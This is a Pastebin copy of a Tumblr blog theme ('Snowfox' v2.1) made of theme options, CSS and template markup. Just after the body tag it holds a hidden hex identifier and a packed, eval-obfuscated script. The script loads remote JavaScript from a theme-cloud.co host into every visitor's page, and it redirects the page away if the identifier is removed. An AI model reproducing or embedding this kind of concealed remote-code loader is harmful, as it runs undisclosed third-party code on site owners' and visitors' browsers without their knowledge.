Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
- <!--
- _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
- | _ | | | | | | |/ / | | | _ | | | | _ |
- | |_| | | | | _| | | / | _ | | |_| | | | | |_| |
- | - | | | | _ | - | _| | - | | _ | -
- | | \ | | | | | | \ | | | | \ | | | | \
- |_ _|\_ _\ |_ _| |_ _ _| |_ _|\_ _\ |_ _ _| |_ _|\_ _\ |_ _ _ _| |_ _|\_ _\
- ******************************************
- Theme by: rickerlr.tumblr.com
- Preview: http://snowfoxtheme.tumblr.com/
- Name: Snowfox
- Version: 2.1
- Year: 2012
- Twitter: @rickerlr
- ******************************************
- -->
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <meta name="color:Background" content="#f5f5f5"/>
- <meta name="color:Borders Into Post" content="#eeeeee"/>
- <meta name="color:Link" content="#000000"/>
- <meta name="color:Link Hover" content="#333333"/>
- <meta name="color:Link Sidebar" content="#444444"/>
- <meta name="color:Link Notes on Text Posts" content="#999999"/>
- <meta name="color:Posts Background" content="#f9f9f9"/>
- <meta name="color:Posts Shadow" content="#999999"/>
- <meta name="color:Text" content="#777777"/>
- <meta name="color:Text Sidebar" content="#777777"/>
- <meta name="color:Title" content="#555555"/>
- <meta name="color:Title Header" content="#555555"/>
- <meta name="if:2 Columns" content="0"/>
- <meta name="if:3 Columns" content="0"/>
- <meta name="if:Container Fade Effect" content="0"/>
- <meta name="if:Dropdown Menu Only Sidebar" content="0"/>
- <meta name="if:Font Damion" content="1"/>
- <meta name="if:Font Fredericka The Great" content="0"/>
- <meta name="if:Font Limelight" content="0"/>
- <meta name="if:Font Open Sans" content="0"/>
- <meta name="if:Font Open Sans Condensed" content="0"/>
- <meta name="if:Font Oswald" content="0"/>
- <meta name="if:Font Titan One" content="0"/>
- <meta name="if:Font Yesteryear" content="0"/>
- <meta name="if:Infinite Scroll" content="1"/>
- <meta name="if:Link Sidebar" content="0"/>
- <meta name="if:Post Border Rounded" content="0"/>
- <meta name="if:Post Margin" content="1"/>
- <meta name="if:Post Padding" content="0"/>
- <meta name="if:Post Shadow" content="1"/>
- <meta name="if:Post Transparent Background" content="0"/>
- <meta name="if:Show Header" content="0"/>
- <meta name="if:Show Photo Caption" content="0"/>
- <meta name="if:Show Notes Counter On Photo Post" content="1"/>
- <meta name="if:Show Notes On Permalink Page" content="0"/>
- <meta name="if:Show Sidebar Image" content="1"/>
- <meta name="if:Show Social Share Buttons On Permalink Page" content="1"/>
- <meta name="if:Sidebar Background" content="0"/>
- <meta name="if:Sidebar Bottom" content="0"/>
- <meta name="if:Sidebar Fixed" content="1"/>
- <meta name="if:Sidebar Right" content="0"/>
- <meta name="if:Sidebar Text Centered" content="0"/>
- <meta name="if:Tumblr Follow Button Fixed" content="0"/>
- <meta name="image:Background image" content="" />
- <meta name="image:Dropmenu Image" content="" />
- <meta name="image:Header Banner" content="" />
- <meta name="image:Sidebar image" content="" />
- <meta name="text:Dropmenu Text" content="Click for links" />
- <meta name="text:Google Analytics ID" content="" />
- <meta name="text:Link 1 title" content="" />
- <meta name="text:Link 1 url" content="" />
- <meta name="text:Link 2 title" content="" />
- <meta name="text:Link 2 url" content="" />
- <meta name="text:Link 3 title" content="" />
- <meta name="text:Link 3 url" content="" />
- <meta name="text:Link 4 title" content="" />
- <meta name="text:Link 4 url" content="" />
- <meta name="text:Link 5 title" content="" />
- <meta name="text:Link 5 url" content="" />
- <meta name="text:Page Text" content="Pages" />
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>{Title}{block:SearchPage}, {lang:Search results for SearchQuery}{/block:SearchPage}{block:PostSummary}, {PostSummary}{/block:PostSummary}</title>
- {block:Description}<meta name="description" content="{MetaDescription}" />{/block:Description}
- <link rel="shortcut icon" href="{Favicon}" />
- <link rel="apple-touch-icon" href="{PortraitURL-128}"/>
- <link rel="alternate" type="application/rss+xml" href="{RSS}" />
- <!-- css reset -->
- <link rel='stylesheet' type='text/css' href='http://static.tumblr.com/dbek3sy/OdLm0dd5f/cssreset.css'>
- <link href='http://fonts.googleapis.com/css?family=Fredericka+the+Great|Yesteryear|Limelight|Titan+One|Damion|Open+Sans|Open+Sans+Condensed:300|Oswald' rel='stylesheet' type='text/css'>
- <style type="text/css" media="screen">
- h1,h2,h3,h4,h5,h6{font-weight: bold;}
- .right{float: right;}
- .left{float: left;}
- .clear {clear: both;}
- body{
- font-size: 100%;
- color: {color:Text};
- font-family: 'Open Sans', arial, verdana, sans-serif;
- text-align: center;
- word-wrap: break-word;
- background-color: {color:Background};
- background-image: url({image:Background image});
- background-repeat: repeat;
- background-attachment: fixed;
- background-position: top left;
- }
- a{
- color: {color:Link};
- text-decoration:none;
- -webkit-transition: all 0.3s ease-out;
- -moz-transition: all 0.3s ease-out;
- transition: all 0.3s ease-out;
- -o-transition: all 0.3s ease-out;
- }
- a:hover{color:{color:Link Hover};}
- #container{
- position: relative;
- top:5px;
- text-align: left;
- margin: 0px auto;
- z-index:0;
- padding-bottom: 100px;
- {block:IfContainerFadeEffect}
- display:none;
- {/block:IfContainerFadeEffect}
- {block:IfPostMargin}
- width:790px;
- {block:IndexPage}
- {block:If2Columns}width:810px;{/block:If2Columns}
- {block:If3Columns}width:930px;{/block:If3Columns}
- {/block:IndexPage}
- {/block:IfPostMargin}
- {block:IfNotPostMargin}
- width:680px;
- {block:IndexPage}
- {block:If2Columns}width:780px;{/block:If2Columns}
- {block:If3Columns}width:880px;{/block:If3Columns}
- {/block:IndexPage}
- {/block:IfNotPostMargin}
- {block:IndexPage}
- {block:IfInfiniteScroll}
- min-height: 1000px;
- height: auto !important;
- height: 1000px;
- {/block:IfInfiniteScroll}
- {/block:IndexPage}
- }
- #header h1{
- margin-bottom: 10px;
- text-align: center;
- color: {color:Title Header};
- font-size: 2em;
- line-height:0.9em;
- {block:IfFontDamion}font-family: 'Damion', cursive;{/block:IfFontDamion}
- {block:IfFontFrederickaTheGreat}font-family: 'Fredericka the Great', cursive;{/block:IfFontFrederickaTheGreat}
- {block:IfFontLimelight}font-family: 'Limelight', cursive;{/block:IfFontLimelight}
- {block:IfFontOpenSans}font-family: 'Open Sans', sans-serif;{/block:IfFontOpenSans}
- {block:IfFontOpenSansCondensed}font-family: 'Open Sans Condensed', sans-serif;{/block:IfFontOpenSansCondensed}
- {block:IfFontOswald}font-family: 'Oswald', sans-serif;{block:IfFontOswald}
- {block:IfFontTitanOne}font-family: 'Titan One', cursive;{/block:IfFontTitanOne}
- {block:IfFontYesteryear}font-family: 'Yesteryear', cursive;{/block:IfFontYesteryear}
- font-weight: normal !important;
- }
- .header-relative {
- position: relative;
- }
- #imagetitle{
- margin-bottom:10px;
- max-width: 840px;
- width:expression(document.body.clientWidth > 840? "840px": "auto" );
- height: auto;
- cursor: pointer;
- }
- #sidebar{
- color: {color:Text Sidebar};
- width: 250px;
- {block:IfNotSidebarFixed}
- position:absolute;
- {/block:IfNotSidebarFixed}
- {block:IfSidebarFixed}
- position:fixed;
- top:105px;
- {block:IfSidebarBottom}bottom:20px;{/block:IfSidebarBottom}
- {/block:IfSidebarFixed}
- {block:IfSidebarTextCentered}
- text-align:center !important;
- {/block:IfSidebarTextCentered}
- {block:IfNotSidebarTextCentered}
- text-align: left;
- {/block:IfNotSidebarTextCentered}
- {block:IfSidebarRight}
- {block:IndexPage}
- {block:IfPostMargin}
- margin-left:530px;
- {block:If2Columns}margin-left:550px;{/block:If2Columns}
- {block:If3Columns}margin-left:670px;{/block:If3Columns}
- {/block:IfPostMargin}
- {block:IfNotPostMargin}
- margin-left:420px;
- {block:If2Columns}margin-left:520px;{/block:If2Columns}
- {block:If3Columns}margin-left:620px;{/block:If3Columns}
- {/block:IfNotPostMargin}
- {block:IndexPage}
- {block:PermalinkPage}
- margin-left: 530px;
- {/block:PermalinkPage}
- {/block:IfSidebarRight}
- }
- #imgSideUploaded{
- {block:IfNotPostPadding}
- position:relative;
- width: 250px;
- {block:IfSidebarBackground}
- margin-left: -10px;
- margin-top: -10px;
- {/block:IfSidebarBackground}
- {/block:IfNotPostPadding}
- {block:IfPostPadding}
- {block:IfSidebarBackground}
- width: 230px;
- {/block:IfSidebarBackground}
- {block:IfPostPadding}
- margin-bottom: 5px;
- }
- #imgSide{
- display:block;
- margin: 0px auto;
- }
- #side_description{
- font-size:0.7em;
- margin-bottom: 5px;
- {block:IfSidebarBackground}
- text-align: justify;
- {/block:IfSidebarBackground}
- }
- #side_description a{color:{color:Link On Sidebar};}
- {block:IfSidebarBackground}
- #sidebar{
- {block:IfPostShadow}
- box-shadow: 0px 0px 3px {color:Posts Shadow};
- {/block:IfPostShadow}
- }
- {/block:IfSidebarBackground}
- #content{
- position:relative;
- top:0px;
- {block:IfPostMargin}
- {block:IfNotSidebarRight}left: 260px;{/block:IfNotSidebarRight}
- {block:IfSidebarRight}left:0px;{/block:IfSidebarRight}
- width:520px;
- {block:IndexPage}
- {block:If2Columns}width:540px;{/block:If2Columns}
- {block:If3Columns}width:660px;{/block:If3Columns}
- {/block:IndexPage}
- {block:IfPostMargin}
- {block:IfNotPostMargin}
- {block:IfNotSidebarRight}left: 220px;{/block:IfNotSidebarRight}
- {block:IfSidebarRight}left:0px;{/block:IfSidebarRight}
- width: 500px;
- {block:IndexPage}
- {block:If2Columns}width:500px;{/block:If2Columns}
- {block:If3Columns}width:600px;{/block:If3Columns}
- {/block:IndexPage}
- {block:IfNotPostMargin}
- }
- #linkHeader{text-align: center;}
- #linkHeader li{
- margin-left:10px;
- display:inline-block;
- font-size:0.65em;
- text-transform:uppercase;
- }
- #linkHeader li:first-child{margin-left:0px;}
- #linkHeader li a{color:{color:Link Sidebar};}
- {block:IfLinkSidebar}
- .dropdownmenu{cursor: pointer;font-size: 0.7em;}
- #imgDropDown{
- max-width: 150px;
- width:expression(document.body.clientWidth > 150? "150px": "auto" );
- }
- {/block:IfLinkSidebar}
- ul#titlePages{display:none}
- ul.titleLinks{
- margin-top:10px;
- text-transform: uppercase;
- }
- ul.titleLinks li{
- display: inline;
- margin-left: 25px;
- }
- ul.titleLinks li:first-child{margin-left: 0px;}
- ul.titleLinks a{
- color:{color:Link Sidebar};
- text-decoration:none;
- }
- ul#sidebarLinks{
- font-size: 0.7em;
- margin-bottom: 5px;
- {block:IfLinkSidebar}
- {block:IfDropdownMenuOnlySidebar}
- display:none;
- {/block:IfDropdownMenuOnlySidebar}
- {/block:IfLinkSidebar}
- }
- ul#sidebarLinks li{margin-top: 2px !important;}
- ul#sidebarLinks a{
- display:block;
- text-decoration:none;
- color:{color:Link Sidebar};
- -webkit-transition: all 0.2s ease-out;
- -moz-transition: all 0.2s ease-out;
- transition: all 0.2s ease-out;
- -o-transition: all 0.2s ease-out;
- }
- ul#sidebarLinks li:hover a{
- color:{color:Link Hover};
- {block:IfNotSidebarRight}padding-right: 10px;{/block:IfNotSidebarRight}
- {block:IfSidebarRight}padding-left: 10px;{/block:IfSidebarRight}
- }
- .opacityBackground{
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 100%;
- {block:IfPostTransparentBackground}
- opacity:0.8;
- filter:alpha(opacity=80);
- {/block:IfPostTransparentBackground}
- z-index: -1;
- }
- .posts{
- position: relative;
- float: left;
- width:500px;
- {block:If2Columns}width:250px;{/block:If2Columns}
- {block:If3Columns}width:200px;{/block:If3Columns}
- {block:PermalinkPage}width:500px;{/block:PermalinkPage}
- z-index: 998;
- {block:IfPostMargin}
- margin: 0px 10px 20px;
- {/block:IfPostMargin}
- {block:IfPostShadow}
- box-shadow: 0px 0px 3px {color:Posts Shadow};
- {/block:IfPostShadow}
- }
- .posts .opacityBackground{block:IfSidebarBackground}, #sidebar .opacityBackground, #topDiv .opacityBackground{/block:IfSidebarBackground}{
- background-color: {color:Posts Background};
- }
- {block:IfPostBorderRounded}
- .posts, img.photoPost, ul#sidebarLinks li, .opacityBackground, .odd, #sidebar, #imgSide {
- -webkit-border-radius: 4px;
- -moz-border-radius: 4px;
- border-radius: 4px;
- }
- {/block:IfPostBorderRounded}
- img.photoPost, .audioImage{
- {block:IfPostPadding}
- width:480px;
- {block:If2Columns}width:230px;{/block:If2Columns}
- {block:If3Columns}width:180px;{/block:If3Columns}
- margin-bottom: -5px !important;
- {/block:IfPostPadding}
- {block:IfNotPostPadding}
- width:500px;
- {block:If2Columns}width:250px;{/block:If2Columns}
- {block:If3Columns}width:200px;{/block:If3Columns}
- margin-top: -10px;
- margin-left: -10px;
- {/block:IfNotPostPadding}
- {block:IndexPage}
- {block:IfShowPhotoCaption}
- margin-bottom: -5px;
- {/block:IfShowPhotoCaption}
- {block:IfNotShowPhotoCaption}
- margin-bottom: -15px;
- {/block:IfNotShowPhotoCaption}
- {/block:IndexPage}
- {block:PermalinkPage}
- margin-bottom: -15px;
- width:500px;
- {block:IfPostPadding}
- width:480px;
- {/block:IfPostPadding}
- {/block:PermalinkPage}
- }
- #socialike{
- margin-bottom:-5px;
- width:160px;
- }
- #nextprevPost{
- width: 160px;
- font-size: 0.7em;
- text-align: right;
- line-height: 20px;
- }
- #nextprevPost a{color: {color:Text};}
- #postnotesdiv{
- font-size:0.75em;
- text-align: left;
- }
- #tagsPermalink{
- margin-top: 15px;
- }
- #tagsPermalink a{margin-left: 10px;}
- #tagsPermalink a:first-child{margin-left: 0px;}
- #pagination{
- font-size: 0.7em;
- position: relative;
- {block:IfInfiniteScroll}
- display:none;
- {/block:IfInfiniteScroll}
- }
- #pagination ul li:first-child{margin-left: 0px;}
- #pagination li{
- display: inline-block;
- margin-left:5px;
- }
- #pagination a{
- text-decoration:none;
- color:{color:Link Sidebar};
- }
- .current_page{color: {color:Text};}
- .install:hover, .preview:hover{
- opacity:0.7;
- filter:alpha(opacity=70);
- }
- .descriprion_link{
- position: absolute;
- display: block;
- opacity:0;
- filter:alpha(opacity=0);
- z-index: 999;
- height:20px;
- line-height: 20px;
- -webkit-transition: all 0.2s ease;
- -moz-transition: all 0.2s ease;
- transition: all 0.23s ease;
- -o-transition: all 0.2s ease;
- {block:IfNotPostPadding}top: 7px;{/block:IfNotPostPadding}
- {block:IfPostPadding}top: 13px;{/block:IfPostPadding}
- }
- .reblog_link{
- {block:IfNotPostPadding}right: 10px;{/block:IfNotPostPadding}
- {block:IfPostPadding}right: 15px;{/block:IfPostPadding}
- display: block;
- width: 21px;
- height: 20px;
- background: url(http://static.tumblr.com/dbek3sy/61vlxuml3/reblog_button.png) no-repeat;
- }
- .permalink_link{
- {block:IfNotPostPadding}right: 60px;{/block:IfNotPostPadding}
- {block:IfPostPadding}right: 65px;{/block:IfPostPadding}
- font-size: 10px;
- padding-left: 4px;
- text-decoration: none;
- color: #fff !important;
- display: inline-block;
- padding: 0px 4px;
- text-decoration: none;
- }
- .like_heart{
- {block:IfNotPostPadding}right: 35px;{/block:IfNotPostPadding}
- {block:IfPostPadding}right: 40px;{/block:IfPostPadding}
- padding:0px;
- margin-left: 5px;
- vertical-align: bottom;
- cursor:pointer;
- }
- .like_heart span{
- display: block;
- width: 21px;
- height: 20px;
- background: url(http://static.tumblr.com/dbek3sy/XiLlxum8q/heart_buttons.png) no-repeat;
- background-position: 0px 0px;
- -webkit-transition: background-position 0.3s ease;
- -moz-transition: background-position 0.3s ease;
- transition: background-position 0.3s ease;
- -o-transition: background-position 0.3s ease;
- }
- .permalink_link{
- background: url(http://static.tumblr.com/dbek3sy/AHGlxfo0s/description_links_bg.png) repeat;
- -webkit-border-radius: 2px;
- -moz-border-radius: 2px;
- border-radius: 2px;
- }
- .posts:hover .descriprion_link{
- opacity:0.85;
- filter:alpha(opacity=85);
- {block:IfNotPostPadding}top: 10px;{/block:IfNotPostPadding}
- {block:IfPostPadding}top: 15px;{/block:IfPostPadding}
- }
- .descriprion_link:hover{
- opacity:1 !important;
- filter:alpha(opacity=100);
- }
- .description_posts{
- font-size:0.65em;
- text-align:center;
- }
- .description_posts a{
- text-decoration: none;
- color: {color:Link Notes on Text Posts};
- }
- .description_posts a:hover{color: {color:Link};}
- .description_posts span{margin-left:10px;}
- .description_posts span:first-child{margin-left: 0px;}
- .posts h2{
- font-size:1em;
- color:{color:Title};
- margin-bottom: 10px;
- line-height: 1.3em;
- }
- .posts h2 a{color:{color:Title} !important;}
- .caption{
- font-size:0.7em;
- line-height:1.5em;
- margin-top:5px;
- margin-bottom: 10px;
- }
- .posts .caption strong, .posts .caption b{font-weight:bold;}
- .posts .caption i, .posts .caption em{font-style:italic;}
- .caption p{margin-top: 5px;}
- .posts .caption ul{
- margin: 10px 0px;
- padding-left: 25px;
- }
- .posts .caption ul li{
- margin-top: 5px;
- list-style-type: disc;
- }
- .posts .caption blockquote{
- padding-left:10px;
- border-left: 3px solid rgba({RGBcolor:Borders Into Post}, 0.8);
- margin: 10px 0px;
- }
- .caption img{
- max-width: 100%
- height: auto;
- display: block;
- margin: 10px 0px;
- }
- .a_photos{opacity:1 !important;filter:alpha(opacity=100);}
- .link{text-decoration:underline !important;}
- .photosetPost{
- margin-top: -10px;
- margin-left: -10px;
- {block:IndexPage}
- {block:If3Columns}
- margin-left: -35px;
- {/block:If3Columns}
- {block:IndexPage}
- }
- .videoPost{
- text-align: center;
- {block:IfNotPostPadding}
- margin-top: -10px;
- margin-left: -10px;
- {block:PermalinkPage}
- margin-bottom: -15px;
- {/block:PermalinkPage}
- {/block:IfNotPostPadding}
- }
- .video_player, .videoPost iframe{
- {block:PermalinkPage}
- {block:IfPostPadding}width: 480px;{block:IfPostPadding}
- {/block:PermalinkPage}
- {block:IndexPage}
- {block:IfNot2Columns}{block:IfNot3Columns}
- {block:IfPostPadding}width: 480px;{/block:IfPostPadding}
- {/block:IfNot3Columns}{/block:IfNot2Columns}
- {block:If3Columns}
- {block:IfPostPadding}width: 180px;{/block:IfPostPadding}
- {block:IfNotPostPadding}width: 200px;{block:IfNotPostPadding}
- height:auto;
- {/block:If3Columns}
- {block:If2Columns}{block:IfNot3Columns}
- {block:IfPostPadding}width: 230px;{/block:IfPostPadding}
- {/block:IfNot3Columns}{/block:If2Columns}
- {/block:IndexPage}
- }
- .chat li.odd,
- .chat li.even{
- padding: 10px;
- }
- .chat li.odd{
- color:{color:Title};
- background-color: rgba({RGBcolor:Borders Into Post}, 0.8);
- }
- .chat li.even{color:{color:Text};}
- .label{
- font-weight:bold;
- font-size: 0.8em;
- }
- .asker{
- color:{color:Link};
- font-weight:bold;
- }
- .quest{
- font-size:0.7em;
- {block:IndexPage}
- width: 340px;
- {block:If2Columns}width: 190px;{/block:If2Columns}
- {block:If3Columns}width: 140px;{/block:If3Columns}
- {/block:IndexPage}
- {block:PermalinkPage}width: 340px;{/block:PermalinkPage}
- }
- .askAnswer{margin-top:10px;}
- .album_art{
- background: #000;
- margin-right: 10px;
- position: relative;
- }
- #audiotrack{width: 265px;}
- #audiotrack li{
- margin: 5px 0px 0px;
- font-size: 0.7em;
- list-style-type: none;
- }
- #audiotrack li:first-child{margin-top: 0px;}
- .audioplayercontainer{
- overflow: hidden;
- {block:IfNotPostPadding}
- margin: -10px 0px 0px -10px;
- width:500px;
- {block:If2Columns}width:250px;{/block:If2Columns}
- {block:If3Columns}width:200px;{/block:If3Columns}
- {/block:IfNotPostPadding}
- {block:IfPostPadding}
- width:480px;
- {block:If2Columns}width:230px;{/block:If2Columns}
- {block:If3Columns}width:180px;{/block:If3Columns}
- {/block:IfPostPadding}
- }
- .audioplayercontainer{
- position:relative;
- z-index:1;
- background:#fff;
- }
- #imgAlbumArt{
- width: 105px;
- height: 105px;
- margin-right:10px;
- background: url(http://static.tumblr.com/dbek3sy/rUTlxzv69/albumart_icon.png) no-repeat;
- }
- ul#sidebarLinks li,
- ul.chat li{
- list-style-type: none;
- margin:0px;
- }
- ol.notes{
- text-align: left;
- }
- {block:IfShowNotesOnPermalinkPage}
- .note{
- margin: 5px 2px;
- list-style-type: none;
- }
- .note.more_notes_link_container{
- padding: 0px;
- margin-top: 20px !important;
- }
- ol.notes li .avatar {
- margin-right:3px;
- vertical-align: middle;
- }
- .note blockquote{margin-left: 20px;}
- {/block:IfShowNotesOnPermalinkPage}
- {block:IfNotShowNotesOnPermalinkPage}
- ol.notes li .avatar {
- width:17px;
- height:17px;
- vertical-align: middle;
- }
- .note{
- float:left;
- margin:0px 2px 2px;
- line-height: 16px;
- }
- .action, .note blockquote{display:none;}
- .action a{color: #fff !important;}
- .note{z-index:10;}
- .note:hover{
- position:relative;
- z-index:100;
- }
- .note:hover .action{
- display: block;
- position:absolute;
- float:left;
- white-space:nowrap;
- top:-2.2em;
- left:.5em;
- background:#000;
- color:#fff;
- padding: 1px 5px;
- z-index:10;
- }
- {/block:IfNotShowNotesOnPermalinkPage}
- .borderTop{
- border-top: 1px solid {color:Borders Into Post};
- margin:10px 0px 5px;
- {block:IfPostTransparentBackground}
- opacity:0.5;
- filter:alpha(opacity=50);
- {/block:IfPostTransparentBackground}
- }
- #infscr-loading{
- bottom: -50px;
- position: absolute;
- left: 50%;
- margin-left: -75px;
- width: 100%;
- text-align: center;
- max-width: 150px;
- width:expression(document.body.clientWidth > 150? "150px": "auto" );
- }
- #infscr-loading div{display: none;}
- {block:IfTumblrFollowButtonFixed}
- #tumblr_controls{
- position:fixed !important;
- }
- {/block:IfTumblrFollowButtonFixed}
- #topDiv{
- position: fixed;
- bottom: 20px;
- right: 10px;
- z-index: 9999;
- display: none;
- font-size: 0.7em;
- cursor: pointer;
- color: {color:Text Sidebar};
- font-weight: bold;
- {block:IfSidebarBackground}
- padding: 5px 10px;
- {block:IfPostShadow}
- box-shadow: 0px 0px 3px {color:Posts Shadow};
- {/block:IfPostShadow}
- {/block:IfSidebarBackground}
- }
- {CustomCSS}
- </style>
- </head>
- <body>
- <div id='guid' style='display:none;'>7987619ABF5217E7437296D77FBE6AA7B0D9ECEEA83155E685CF0F12C62A4BAA972A4F67114C87F9B5304697BF9957D8</div>
- <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 b=a;5 k=a;5 4=6.o("l");d(4==n){b=g;e.i.f="7://3-9.8/j-3/?c=1"}m d(4==""){b=g;e.i.f="7://3-9.8/j-3/?c=1"}{5 2=6.y(\'2\');2.x=a;2.z=\'A/p\';2.B="7://w.3-9.8/v.r?c="+4.q;(6.h(\'s\')[0]||6.h(\'t\')[0]).u(2)}',38,38,'||script|theme|g_x|var|document|http|co|cloud|true|g_Valid|id|if|window|href|false|getElementsByTagName|location|invalid|g_T|guid|else|null|getElementById|javascript|innerHTML|asp|HEAD|BODY|appendChild|storage|themeweaver|async|createElement|type|text|src'.split('|'),0,{}))</script>
- {block:IfShowHeader}
- <div id="header" class="header-relative">
- <div style="padding:20px 0px;">
- {block:IfHeaderBannerImage}
- <img id="imagetitle" src="{image:Header Banner}">
- {/block:IfHeaderBannerImage}
- {block:IfNotHeaderBannerImage}
- <h1>{Title}</h1>
- {/block:IfNotHeaderBannerImage}
- {block:IfNotLinkSidebar}
- <ul id="linkHeader">
- <li><a href="/">Home</a></li>
- {block:AskEnabled}
- <li><a href="/ask" {Target}>{AskLabel}</a></li>
- {/block:AskEnabled}
- {block:SubmissionsEnabled}
- <li><a id="submitOpen" href="javascript:void(0)" {Target}>Submit</a></li>
- {/block:SubmissionsEnabled}
- {block:HasPages}
- {block:Pages}
- <li><a href="{URL}" {Target}>{Label}</a></li>
- {/block:Pages}
- {/block:HasPages}
- </ul>
- {/block:IfNotLinkSidebar}
- <div id="headerOpacity"></div>
- </div>
- </div><!-- header -->
- {/block:IfShowHeader}
- <div id="container">
- <div id="sidebar">
- {block:IfSidebarBackground}
- <div style="padding:10px;">
- {/block:IfSidebarBackground}
- {block:IfShowSidebarImage}
- {block:IfSidebarimageImage}
- <img id="imgSideUploaded" src="{image:Sidebar image}">
- {/block:IfSidebarimageImage}
- {block:IfNotSidebarimageImage}
- <img id="imgSide" src="{PortraitURL-128}">
- {/block:IfNotSidebarimageImage}
- {/block:IfShowSidebarImage}
- <div id="side_description">{Description}</div>
- {block:IfLinkSidebar}
- {block:IfDropdownMenuOnlySidebar}
- {block:IfDropmenuImageImage}
- <img class="dropdownmenu" id="imgDropDown" src="{image:Dropmenu Image}">
- {/block:IfDropmenuImageImage}
- {block:IfNotDropmenuImageImage}
- <span class="dropdownmenu">{text:Dropmenu Text}</span>
- {/block:IfNotDropmenuImageImage}
- {block:IfDropdownMenuOnlySidebar}
- <ul id="sidebarLinks">
- <li><a href="/">Home</a></li>
- {block:AskEnabled}
- <li><a href="/ask" {Target}>{AskLabel}</a></li>
- {/block:AskEnabled}
- {block:SubmissionsEnabled}
- <li><a id="submitOpen" href="javascript:void(0)" {Target}>Submit</a></li>
- {/block:SubmissionsEnabled}
- {block:HasPages}
- {block:Pages}
- <li><a href="{URL}" {Target}>{Label}</a></li>
- {/block:Pages}
- {/block:HasPages}
- </ul>
- {/block:IfLinkSidebar}
- {block:IndexPage}
- {block:Pagination}
- {block:IfNotInfiniteScroll}
- <div class="borderTop"></div>
- {/block:IfNotInfiniteScroll}
- <ul id="pagination">
- {block:PreviousPage}
- <li><a href="{PreviousPage}">«</a></li>
- {/block:PreviousPage}
- {block:JumpPagination length="5"}
- {block:CurrentPage}
- <li><span class="current_page numbersNav"><strong>{PageNumber}</strong></span></li>
- {/block:CurrentPage}
- {block:JumpPage}
- <li><a class="jump_page numbersNav" href="{URL}">{PageNumber}</a></li>
- {/block:JumpPage}
- {/block:JumpPagination}
- {block:NextPage}
- <li><a id="nextPage" href="{NextPage}">»</a></li>
- {/block:NextPage}
- <div class="opacityBackground"></div>
- </ul>
- {/block:Pagination}
- {/block:IndexPage}
- {block:IfSidebarBackground}
- </div><!-- sidebar padding-->
- {/block:IfSidebarBackground}
- <div class="opacityBackground"></div>
- </div><!-- sidebar -->
- <div id="content">
- {block:Posts}
- <div class="posts">
- <div style="padding:10px;overflow: hidden;">
- {block:Text}
- {block:Title}
- <h2>{Title}</h2>
- {/block:Title}
- <div class="caption">{Body}</div>
- {block:IndexPage}
- {block:Date}
- <div class="borderTop"></div>
- <div class="description_posts">
- <span><a href="{Permalink}">{TimeAgo}</a></span>
- <span><a href="{Permalink}">{NoteCountWithLabel}</a></span>
- <span><a href="{ReblogURL}" target="_blank">Reblog</a></span>
- </div>
- {/block:Date}
- {/block:IndexPage}
- {/block:Text}
- {block:Link}
- <h2><a href="{URL}" {Target}>{Name}</a></h2>
- {block:Description}
- <div class="caption">{Description}</div>
- {/block:Description}
- {block:IndexPage}
- {block:Date}
- <div class="borderTop"></div>
- <div class="description_posts">
- <span><a href="{Permalink}">{TimeAgo}</a></span>
- <span><a href="{Permalink}">{NoteCountWithLabel}</a></span>
- <span><a href="{ReblogURL}" target="_blank">Reblog</a></span>
- </div>
- {/block:Date}
- {/block:IndexPage}
- {block:Link}
- {block:Photo}
- {block:IndexPage}
- {block:IfNotShowNotesCounterOnPhotoPost}<a href="{Permalink}" class="a_photos">{/block:IfNotShowNotesCounterOnPhotoPost}
- <img class="photoPost" style="{block:IfShowPhotoCaption}{block:Caption}margin-bottom: 10px;{/block:Caption}{/block:IfShowPhotoCaption}" src="{block:IfNot2Columns}{block:IfNot3Columns}{PhotoURL-500}{/block:IfNot3Columns}{/block:IfNot2Columns}{block:If3Columns}{PhotoURL-250}{/block:If3Columns}{block:If2Columns}{block:IfNot3Columns}{PhotoURL-250}{/block:IfNot3Columns}{/block:If2Columns}" alt="{PhotoAlt}" />
- {block:IfNotShowNotesCounterOnPhotoPost}</a>{/block:IfNotShowNotesCounterOnPhotoPost}
- {block:IfShowPhotoCaption}
- {block:Caption}
- <div class="caption">{Caption}</div>
- {/block:Caption}
- {/block:IfShowPhotoCaption}
- {block:IfNotShowPhotoCaption}
- {block:IfShowNotesCounterOnPhotoPost}
- <a id="note_count_{PostID}" class="descriprion_link permalink_link" href="{Permalink}">{NoteCount}</a>
- {/block:IfShowNotesCounterOnPhotoPost}
- <a href="{ReblogURL}" target="_blank" class="descriprion_link reblog_link"></a>
- <a class="descriprion_link like_heart" href="javascript:void(0);"><span id="{PostID}" rel="{ReblogURL}"></span></a>
- {/block:IfNotShowPhotoCaption}
- {block:IfShowPhotoCaption}
- {block:Date}
- <div class="borderTop"></div>
- <div class="description_posts">
- <span><a href="{Permalink}">{TimeAgo}</a></span>
- <span><a href="{Permalink}">{NoteCountWithLabel}</a></span>
- <span><a href="{ReblogURL}" target="_blank">Reblog</a></span>
- </div>
- {/block:Date}
- {/block:IfShowPhotoCaption}
- {/block:IndexPage}
- {block:PermalinkPage}
- <img class="photoPost" src="{PhotoURL-500}" alt="{PhotoAlt}" style="{block:Caption}margin-bottom: 10px;{/block:Caption}"/>
- {block:Caption}
- <div class="caption">{Caption}</div>
- {/block:Caption}
- {/block:PermalinkPage}
- {/block:Photo}
- {block:Photoset}
- {block:IndexPage}
- <div class="photosetPost" style="{block:IfShowPhotoCaption}{block:Caption}margin-bottom: 10px;{/block:Caption}{/block:IfShowPhotoCaption}">
- {block:IfNot2Columns}{block:IfNot3Columns}{Photoset-500}{/block:IfNot3Columns}{/block:IfNot2Columns}
- {block:If3Columns}{Photoset-250}{/block:If3Columns}
